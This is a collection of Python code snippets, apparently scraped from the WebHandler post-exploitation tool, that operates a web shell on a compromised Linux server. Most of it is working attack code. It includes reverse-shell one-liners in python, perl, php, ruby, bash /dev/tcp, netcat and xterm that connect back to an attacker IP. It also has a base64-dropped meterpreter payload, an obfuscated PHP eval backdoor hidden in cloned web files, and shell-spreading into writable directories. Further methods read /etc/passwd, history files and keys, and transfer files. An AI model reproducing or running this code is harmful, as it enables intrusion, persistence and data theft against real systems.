예제 #1
0
 def upload(self, command):
     if len(command) != 3:
         cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]', 'red')
     else:
         lfile_path = command[1]
         rfile_path = command[2]
         file_handler.upload_file(lfile_path, rfile_path)
예제 #2
0
    def system(self):
        cmd = 'bash -c "input=\$(uptime); if [[ \$input == *day* ]]; then out=\$(echo \$input | awk \'{print \$3\\" days\\"}\'); if [[ \$input == *min* ]]; then out=\$(echo \\"\$out and \\" && echo \$input | awk \'{print \$5\\" minutes\\"}\'); else out=\$(echo \\"\$out, \\" && echo \$input | awk \'{print \$5}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi elif [[ \$input == *min* ]]; then out=\$(echo \$input | awk \'{print \$3\\" minutes\\"}\'); else out=\$(echo \$input | awk \'{print \$3}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi; echo \$out;" ;'
        cmd += "awk '{print ($1/(60*60*24))/($2/(60*60*24))*100 \"%\"}' /proc/uptime;"
        cmd += "w -h | wc -l;"
        cmd += "wc -l /etc/passwd | awk '{print $1}';"
        cmd += "wc -l /etc/group | awk '{print $1}';"
        cmd += "awk '{print $1 \" \" $2 \" \" $3}' /proc/loadavg;"
        cmd += "free -m | grep 'buffers/cache' | awk '{print $3*100/($3+$4)}';"
        cmd += "netstat -tn | grep ESTABLISHED | wc -l | awk '{print $1}';"
        cmd += "netstat -atn | grep LISTEN | wc -l | awk \"{print $1}\";"
        cmd += "awk '{split($4,a,\"/\"); print a[1];}' /proc/loadavg;"
        cmd += "awk '{split($4,a,\"/\"); print a[2];}' /proc/loadavg;"

        system = make_request.get_page_source(cmd)

        output = '\n[+] Uptime: {0}\n'.format(system[0])
        output += '[+] Idletime: {0}\n'.format(system[1])
        output += '[+] Users Logged in: {0}\n'.format(system[2])
        output += '[+] Total Users: {0}\n'.format(system[3])
        output += '[+] Total Groups: {0}\n'.format(system[4])
        output += '[+] CPU Load (1, 5, 15 mins): {0}\n'.format(system[5])
        output += '[+] Memory Load (Used %): {0}\n'.format(system[6])
        output += '[+] Established TCP Connections: {0}\n'.format(system[7])
        output += '[+] Listening TCP Services: {0}\n'.format(system[8])
        output += '[+] User Processors: {0}\n'.format(system[9])
        output += '[+] Total Processor: {0}'.format(system[10])

        cprint(output, 'green')
예제 #3
0
 def get_writble_dir(self):
     cmd = "find / -perm -0003 -type d 2>/dev/null | sort -R"  # -print -quit
     result = make_request.get_page_source(cmd)
     if result:
         result = result[0]
         cprint('\n[+] Found a directory to use: \'{0}\''.format(result), 'green')
     else:
         cprint('\n[!] Unable to find a suitable directory', 'red')
     return result
예제 #4
0
 def history(self):
     cmd = 'for i in $(cut -d: -f6 /etc/passwd | sort | uniq); do [ -f $i/.bash_history ] && echo "bash_history: $i"; [ -f $i/.nano_history ] && echo "nano_history: $i"; [ -f $i/.atftp_history ] && echo "atftp_history: $i"; [ -f $i/.mysql_history ] && echo "mysql_history: $i"; [ -f $i/.php_history ] && echo "php_history: $i";done'
     self.history = make_request.get_page_source(cmd)
     if self.history:
         c = 1
         for path in self.history:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
     else:
         cprint('\n[!] Didn\'t find any \'history\' files', 'red')
예제 #5
0
 def writable(self):
     cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root())
     self.writable = make_request.get_page_source(cmd)
     if self.writable:
         c = 1
         for path in self.writable:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
     else:
         cprint('\n[!] Didn\'t find any wriable directories', 'red')
예제 #6
0
 def download_file(self, rfile_path, lfile_path):
     cmd = 'if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi'.format(rfile_path)
     file_type = make_request.get_page_source(cmd)[0]
     if file_type == 'file':
         cmd = 'cat {0}'.format(rfile_path)
         try:
             with open(lfile_path, 'w') as dest_file:
                 dest_file.write('\n'.join(make_request.get_page_source(cmd)) + '\n')
             print '\n[+] Successfully downloaded "{0}" to "{1}"'.format(rfile_path, lfile_path)
         except IOError, e:
             cprint('\n[!] Error: {0}'.format(e), 'red')
예제 #7
0
 def spread(self):
     provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green'))
     shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name
     cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name)
     done = make_request.get_page_source(cmd)
     if done:
         success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format(
                 shell_name=shell_name,
                 writable_length=len(done))
         success += '\n[+] To check these paths type @enum writable'
         cprint(success, 'blue')
     else:
         cprint('\n[!] Something went wrong while spreading shell', 'red')
예제 #8
0
 def download(self, command):
     if len(command) not in (2, 3):
         cprint('\[!] Usage: @download [remote_file_path] <local_file_path>', 'red')
     else:
         rfile_path = command[1]
         if len(command) == 2:
             lfile_path = '{0}/output/{1}{2}_{3}'.format(getcwd(), info.host_ip, rfile_path, info.session)
             lfolder = '/'.join(lfile_path.split('/')[:-1])
             if not path.exists(lfolder):
                 makedirs(lfolder)
         else:
             lfile_path = command[2]
         file_handler.download_file(rfile_path, lfile_path)
예제 #9
0
 def python(self, ip, port):
     cmd = "for x in `whereis python`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     python = make_request.get_page_source(cmd)
     if python:
         cprint('\n[i] Found python:', 'green')
         c = 1
         for path in python:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in python:
             cmd = 'nohup {0} -c '.format(path)
             cmd += '\'import socket,subprocess,os;'
             cmd += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
             cmd += 's.connect(("{0}",{1}));'.format(ip, port)
             cmd += 'os.dup2(s.fileno(),0);'
             cmd += 'os.dup2(s.fileno(),1);'
             cmd += 'os.dup2(s.fileno(),2);'
             cmd += 'p=subprocess.call(["/bin/sh","-i"]);\' &'
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find python on the remote system', 'red')
예제 #10
0
 def perl(self, ip, port):
     cmd = "for x in `whereis perl`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     perl = make_request.get_page_source(cmd)
     if perl:
         cprint('\n[i] Found perl:', 'green')
         c = 1
         for path in perl:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in perl:
             cmd = 'nohup {0} -e '.format(path)
             cmd += '\'use Socket;'
             cmd += '$i="{0}";'.format(ip)
             cmd += '$p="{0}";'.format(port)
             cmd += 'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
             cmd += 'if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");'
             cmd += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' &'
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find perl on the remote system', 'red')
예제 #11
0
    def ip(self):
        cmd = "ip addr show | grep inet | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;"
        cmd += "curl http://ifconfig.me/ip;"
        cmd += "cat /etc/resolv.conf | grep nameserver | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;"
        cmd += "/sbin/route -n | awk '{print $2}' | grep -v 0.0.0.0 | grep -v IP | grep -v Gateway | head -n 1;"
        #grep -q "BOOTPROTO=dhcp" /etc/sysconfig/network-scripts/ifcfg-eth0 2>/dev/null
        #grep -q "inet dhcp" /etc/network/interfaces 2>/dev/null
        cmd += 'dhcp_ip=`grep dhcp-server /var/lib/dhcp*/dhclient.* 2>/dev/null | uniq | awk \'{print $4}\' | tr -d ";"`; if [ $dhcp_ip ] ; then echo "Yes ($dhcp_ip)"; else echo "No"; fi;'

        ip = make_request.get_page_source(cmd)

        output = '\n[+] Internal IP/subnet: {0}\n'.format(ip[0])
        output += '[+] External IP: {0}\n'.format(ip[1])
        output += '[+] DNS: {0}\n'.format(ip[2])
        output += '[+] Gateway: {0}\n'.format(ip[3])
        output += '[+] DHCP?: {0}'.format(ip[4])

        cprint(output, 'green')
예제 #12
0
    def keys(self):
        cmd = "find / -type f -print0 | xargs -0 -I '{}' bash -c 'openssl x509 -in {} -noout > /dev/null 2>&1; [[ $? == '0' ]] && echo \"{}\"'"
        self.ssl = make_request.get_page_source(cmd)
        if self.ssl:
            c = 1
            for path in self.ssl:
                print '{0:2d}.) {1}'.format(c, path)
                c += 1
        else:
            cprint('\n[!] Didn\'t find any SSL certs', 'red')

        cmd = "find / -type f -print0 | xargs -0 -I '{}' bash -c 'openssl x509 -in {} -noout > /dev/null 2>&1; [[ $? == '0' ]] && echo \"{}\"'"
        self.sshpub = make_request.get_page_source(cmd)
        if self.sshpub:
            c = 1
            for path in self.sshpub:
                print '{0:2d}.) {1}'.format(c, path)
                c += 1
        else:
            cprint('\n[!] Didn\'t find any public SSH keys', 'red')
예제 #13
0
    def os(self):
        cmd = "hostname;"
        cmd += "uname -a;"
        #cmd += "grep DISTRIB_DESCRIPTION /etc/*-release | head -n 1;"
        cmd += "cat /etc/*-release | head -n 1 | sed 's/DISTRIB_ID=//';"
        cmd += "date;"
        cmd += "zdump UTC | sed 's/UTC  //';"
        #cmd += "python -c 'import locale; print locale.getdefaultlocale()[0];';"
        cmd += "echo $LANG;"

        os = make_request.get_page_source(cmd)

        output = '\n[+] Hostname: {0}\n'.format(os[0])
        output += '[+] Kernel: {0}\n'.format(os[1])
        output += '[+] OS: {0}\n'.format(os[2])
        output += '[+] Local Time: {0}\n'.format(os[3])
        output += '[+] Timezone (UTC): {0}\n'.format(os[4])
        output += '[+] Language: {0}'.format(os[5])

        cprint(output, 'green')
예제 #14
0
    def connected(self):
        while True:
            try:
                buffer = self.socket.recv(1024)
                if buffer == '':
                    cprint('\n[!] Lost connection. Exiting...', 'red')
                    self.socket.close()
                    exit(1)
                while buffer != '':
                    sys.stdout.write(buffer)
                    sys.stdout.flush()
                    buffer = self.socket.recv(1024)
            except socket.error:
                pass

            try:
                cmd = raw_input("Command [>]: ")
                if(self.socket.sendall(cmd + "\n") != None):
                    cprint('\n[!] Error in sending data', 'red')
                time.sleep(0.1)
            except KeyboardInterrupt:
                print ""
                pass
예제 #15
0
 def xterm(self, ip, port):
     cmd = "for x in `whereis xterm`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     xterm = make_request.get_page_source(cmd)
     if xterm:
         cprint('\n[i] Found xterm:', 'green')
         c = 1
         for path in xterm:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         #raw_input('\n{0}[i] Make sure: \'{1}\' has a listener shell setup on port: \'{2}\'{4} (hint: python webhandler.py -l {2} OR nc -lvvp {2})\n{3}[?] Press <return> when ready!{4}'.format(Colors.GREEN, ip, port, Colors.YELLOW, Colors.END))
         for path in xterm:
             cmd = 'nohup {0} xterm -display {1}:1 &'.format(path, ip)
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find xterm on the remote system', 'red')
예제 #16
0
파일: update.py 프로젝트: s3my0n/webhandler
def update():
    if not path.exists(path.join(getcwd(), ".git")):
        errmsg = '\n[!]".git" directory doesn\'t exist here.'
        errmsg += '\n[!] Clone webhandler (e.g. mv -f $(pwd){,_old} && git clone https://github.com/lnxg33k/webhandler.git $(pwd))'
        cprint(errmsg, 'red')
    else:
        f = Popen('git rev-parse --short HEAD', shell=True, stdout=PIPE, stderr=PIPE)
        current_commit = f.communicate()[0]
        msg = '\n[+] WebHandler current commit: {0}'.format(current_commit)
        msg += '[+] Update in progress, please wait...'
        cprint(msg, 'green')
        f = Popen('git pull; git rev-parse --short HEAD', shell=True, stdout=PIPE, stderr=PIPE)
        out, err = f.communicate()
        if out and not err:
            msg = '[+] Updated successfully to: {0}\n'.format(out.split()[-1])
            msg += '\n[i] Make sure to re-run WebHandler to use the updated version'
            cprint(msg, 'green')
        else:
            errmsg = '\n[!] \'git\' is required to update webhandler from CLI'
            errmsg += '\n[!] To install it (e.g. sudo apt-get install git OR sudo yum install git)'
            cprint(errmsg, 'red')
예제 #17
0
 def php_cli(self, ip, port):
     cmd = "for x in `whereis php`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     php = make_request.get_page_source(cmd)
     if php:
         cprint('\n[i] Found php-cli:', 'green')
         c = 1
         for path in php:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in php:
             cmd = 'nohup {0} -r '.format(path)
             cmd += '\'$sock=fsockopen("{0}",{1});'.format(ip, port)
             cmd += 'exec("/bin/sh -i <&3 >&3 2>&3");\' &'
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find php-cli on the remote system', 'red')
예제 #18
0
 def ruby(self, ip, port):
     cmd = "for x in `whereis ruby`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     ruby = make_request.get_page_source(cmd)
     if ruby:
         cprint('\n[i] Found ruby:', 'green')
         c = 1
         for path in ruby:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in ruby:
             cmd = 'nohup {0} -rsocket -e'.format(path)
             cmd += '\'f=TCPSocket.open("{0}",{1}).to_i;'.format(ip, port)
             cmd += 'exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\' &'
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find ruby on the remote system', 'red')
예제 #19
0
 def netcat(self, ip, port):
     '''
     nc.OpenBSD deosn't have -e switch. Alternative solution:
         rm -f /tmp/f && mkfifo /tmp/f && cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT>/tmp/f
     '''
     cmd = "for x in `whereis nc netcat`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     netcat = make_request.get_page_source(cmd)
     if netcat:
         cprint('\n[i] Found netcat:', 'green')
         c = 1
         for path in netcat:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in netcat:
             cmd = 'nohup {0} {1} {2} -e /bin/bash &'.format(path, ip, port)
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
     else:
         cprint('\n[!] Didn\'t find netcat on the remote system', 'red')
예제 #20
0
 def bash(self, ip, port):
     cmd = "for x in `whereis bash`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done"
     bash = make_request.get_page_source(cmd)
     if bash:
         cprint('\n[i] Found bash:')
         c = 1
         for path in bash:
             cprint('{0:2d}.) {1}'.format(c, path), 'green')
             c += 1
         msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
         msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})'
         msg += colored('\n[?] Press <return> when ready!', 'yellow')
         raw_input(msg.format(ip, port))
         for path in bash:
             cmd = 'nohup {0} -c \'{0} -i >& /dev/tcp/{1}/{2} 0>&1\' &'.format(path, ip, port)
             make_request.get_page_source(cmd)
         cprint('[+] Done!', 'blue')
예제 #21
0
 def wait_connection(self):
     try:
         print colored('\n[i] Waiting on port: ', 'green') + colored(self.port, 'yellow')
         server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         server.bind(('0.0.0.0', self.port))
         server.listen(1)
         try:
             self.socket, self.address = server.accept()
             self.socket.setblocking(0)
             targetIP, targetPort = self.address
             cprint('[+] Received connection from: {0}'.format(targetIP), 'magenta')
             self.connected()
         except KeyboardInterrupt:
             cprint('\n[!] Lost connection. Exiting...', 'red')
     except socket.error:
         cprint('\n[!] Wasn\'t able to open a port. Make sure to run WebHanlder with a user which can (e.g. superuser)', 'red')
         exit(3)
예제 #22
0
    def passwd(self):
        cmd = 'cat /etc/passwd;'
        users = make_request.get_page_source(cmd)

        header = '{0:17} | {1:11} | {2:7} | {3:8} | {4:35} | {5:28} | {6}'.format(
                "Username",
                "Password",
                "User ID",
                "Group ID",
                "User Info",
                "Home Directory",
                "Shell",)
        line = "-" * len(header)

        cprint('[+] Total number of users: {0}'.format(len(users)), 'magenta')

        cprint(line, 'green')
        cprint(header, 'green')
        cprint(line, 'green')
        c = 1
        for user in users:
            uname = user.split(':')[0]
            passwd = user.split(':')[1]
            if passwd == "x":
                passwd = "*In shadow*"
            uid = user.split(':')[2]
            guid = user.split(':')[3]
            uinfo = user.split(':')[4]
            home = user.split(':')[5]
            shell = user.split(':')[6]
            cprint('{0:17} | {1:11} | {2:7} | {3:8} | {4:35} | {5:28} | {6}'.format(
                    uname,
                    passwd,
                    uid,
                    guid,
                    uinfo,
                    home,
                    shell,), 'green')
            c += 1
        cprint(line, 'green')
예제 #23
0
 def msf(self, ip, port):
     if len(Popen("for x in `whereis msfvenom`; do file $x | grep symbolic; done", shell=True, stdout=PIPE).stdout.read().strip()) == 0:
         cprint('\n[!] Wasn\'t able to detect the metasploit framework', 'red')
     else:
         cprint('\n[i] Found the metasploit framework:', 'green')
         folder = linux.get_writble_dir()
         if folder:
             filename = ''.join(choice(string.ascii_letters + string.digits) for x in range(8))
             cprint('[+] Filename: \'{0}\''.format(filename), 'green')
             path = '{0}/{1}'.format(folder, filename)
             msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
             msg += ' (hint: msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} E)'
             msg += colored('\n[?] Press <return> when ready!', 'yellow')
             raw_input(msg.format(ip, port))
             cprint('[i] Generating linux/x86/meterpreter/reverse_tcp', 'green')
             shell = Popen('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf | base64'.format(ip, port), shell=True, stdout=PIPE).stdout.read().strip()
             cmd = 'echo "{0}" | base64 -i -d > {1} && chmod +x {1} && nohup {1} &'.format(shell, path)
             cprint('{0}[+] Sending payload & executing', 'green')
             make_request.get_page_source(cmd)
             cprint('[+] Done!', 'blue')
예제 #24
0
 def BackConnect(self):
     complete.tab()      # calling auto-complete method
     cmdcount = 1
     # Empty list to save attacker's pushed commands
     while True:
         try:
             try:
                 # Getting command to be executed from the user
                 command = raw_input(info.current_user +
                         colored('@', 'red') +
                         colored(info.host_ip.split(',')[0], 'green') + ':~' +
                         colored('({0})'.format(self.cwd), 'yellow') + ':$ ').strip()
             # If something went wrong screw the list
             except IndexError:
                 command = raw_input('WebHandler@server:$ ').strip()
             
             command_list = command.split()
             
             # Updating command history
             self.history.append(unquote(command))
             
             if command not in ('exit', 'quit', 'bye'):
                 if command == 'clear':
                     Popen('clear', shell=True).wait()
                 elif command[0] == '!':
                     self.execute(command)
                 # Execute a module
                 elif command[0] == '@':
                     try:
                         self.commands[command_list[0]](command_list)
                     except KeyError:
                         print '%s module does not exist!' % (command_list[0])
                 else:
                     try:
                         #Handle the current working directory 'cwd'
                         if command_list[0] == 'cd' and len(command_list) > 1:
                             cwd = self.cwd
                             if '../' in command_list[-1] or '..' in command_list[-1]:
                                 self.cwd = cwd.rstrip(cwd.split('/').pop()).rstrip('/')
                             else:
                                 if command_list[-1].startswith('/'):
                                     cmd = '[ -d {0} ] && echo is_valid'.format(command_list[-1])
                                     if make_request.get_page_source(cmd)[0] == 'is_valid':
                                         self.cwd = command_list[-1]
                                     else:
                                         print 'bash: cd: {0}: No such file or directory'.format(command_list[-1])
                                 else:
                                     cmd = '[ -d {0}/{1} ] && echo is_valid'.format(cwd, command_list[-1])
                                     if make_request.get_page_source(cmd)[0] == 'is_valid':
                                         self.cwd = '{0}/{1}'.format(cwd, command_list[-1])
                                     else:
                                         print 'bash: cd: {0}: No such file or directory'.format(command_list[-1])
     
                         elif command_list[0] == 'cd' and len(command) == 1:
                             self.cwd = info.cwd  # dirty patch to get the original cwd
     
                         else:
                             # Setting aliases for some commands to avoid
                             # Issues realted to empty directories
                             command = command.replace('ls', 'ls -lha') if command_list[0] == 'ls' else command
                             command = command.replace('rm', 'rm -v') if command_list[0] == 'rm' else command
                             command = command.replace('cp', 'cp -v') if command_list[0] == 'cp' else command
                             command = command.replace('ifconfig', '/sbin/ifconfig')
     
                             # Get the source code cotenets
                             cmd = 'cd {0};{1}'.format(self.cwd, command)
                             source = make_request.get_page_source(cmd)
                             if source:
                                 for line in source:
                                     print line
     
                             # If the executed command doesn't exist
                             else:
                                 errmsg = '{0}: command not found '.format(unquote(command))
                                 errmsg += 'or I don\'t have permission to execute it'
                                 if command_list[0] == 'echo':
                                     pass
                                 else:
                                     cprint(errmsg, 'red')
                     except IndexError:
                         pass
             # Exit WebHandler if user provides exit as a command
             else:
                 print '\n[+] Preformed "%d" commands on the server, %s\n[*] Connection closed' % (cmdcount, info.host_ip.split(',')[0])
                 break
             
         # If recieved a break (^c)... Do nothing!
         except KeyboardInterrupt:
             print ""
         cmdcount += 1
예제 #25
0
    def group(self):
        cmd = 'cat /etc/group;'
        groups = make_request.get_page_source(cmd)

        header = '{0:15} | {1:11} | {2:8} | {3:8} |'.format("Group Name", "Password", "Group ID", "Group List")
        line = "-" * len(header)

        cprint('[+] Total number of groups: {0}'.format(len(groups)), 'magenta')

        cprint(line, 'green')
        cprint(header, 'green')
        cprint(line, 'green')
        c = 1
        for group in groups:
            gname = group.split(':')[0]
            passwd = group.split(':')[1]
            if passwd == "x":
                passwd = "*In shadow*"
            guid = group.split(':')[2]
            glist = group.split(':')[3]
            cprint('{0:15} | {1:11} | {2:8} | {3:8} {4:2}|'.format(gname, passwd, guid, glist, ' '), 'green')
            c += 1
        cprint(line, 'green')
예제 #26
0
            cmd = 'find {0} | while read f;do echo $f;done'.format(rfile_path)
            files = make_request.get_page_source(cmd)
            for file in files:
                cmd = 'if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi'.format(file)
                file_type = make_request.get_page_source(cmd)[0]
                if file_type == 'dir':
                    os.makedirs(os.path.join(lfile_path, file))
                elif file_type == 'file':
                    cmd = 'cat {0}'.format(file)
                    try:
                        with open(os.path.join(lfile_path, file), 'w') as dest_file:
                            dest_file.write('\n'.join(make_request.get_page_source(cmd)) + '\n')
                    except IOError, e:
                        cprint('\n[!] Error: {0}'.format(e), 'red')
                else:
                    print colored('[!] Coudln\'t download the following file:', 'red'), file
            print colored('\n[+] Files downloaded successfully to:', 'green'), lfile_path
        else:
            cprint('\n[!]The file/directory doesn\'t exist or I don\'t have permission', 'red')

    # A method for uploading files to the box
    def upload_file(self, lfile_path, rfile_path):
        with open(lfile_path) as local_file:
            data_to_upload = local_file.read().encode('base64').strip()
        #for line in data_to_upload:
        cmd = 'echo {0} | base64 -d > {1}'.format(data_to_upload, rfile_path)
        make_request.get_page_source(cmd)
        print '\n[+] Successfully uploaded {0} to {1}'.format(lfile_path, rfile_path)

file_handler = FileHandler()
예제 #27
0
    def php(self, ip, ourIP):
        wwwroot = linux.get_doc_root()
        cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
        folder = make_request.get_page_source(cmd)
        if folder:
            folder = folder[0]
            cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
            filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
            cprint('[+] Filename: \'{1}\''.format(filename), 'green')
            location = '{0}/{1}'.format(folder, filename)

            cmd = 'find {0} -type f -print'.format(wwwroot)
            files = make_request.get_page_source(cmd)
            cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
            cprint(' 0.) Don\'t close - create new', 'green')
            path = []
            c = 0
            for file in files:
                path.append(file)
                c += 1
                cprint('{0:2d}.) {1}'.format(c, file), 'green')
            while True:
                try:
                    clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
                    if 0 <= clone <= c:
                        break
                except ValueError:
                    pass

            if clone != 0:
                cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
                make_request.get_page_source(cmd)
            cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
            parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
            casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
            caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
            payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
            payloadEncoded = b64encode(payload).format(payload)
            evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
            cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
            make_request.get_page_source(cmd)
            cprint('[+] Done!', 'blue')
            uri = folder[len(wwwroot):]

            #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
            #'https://localhost'
            url = '/'.join(getargs.url.split('/', 3)[:3])
            example = """Example:
            curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
            curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
            curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
            msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
                    url=url,
                    uri=uri,
                    filename=filename,
                    parameter=parameter,
                    ourIP=ourIP,)
            cprint(example, 'green')
        else:
            cprint('\n[!] Unable to find a writable directory', 'red')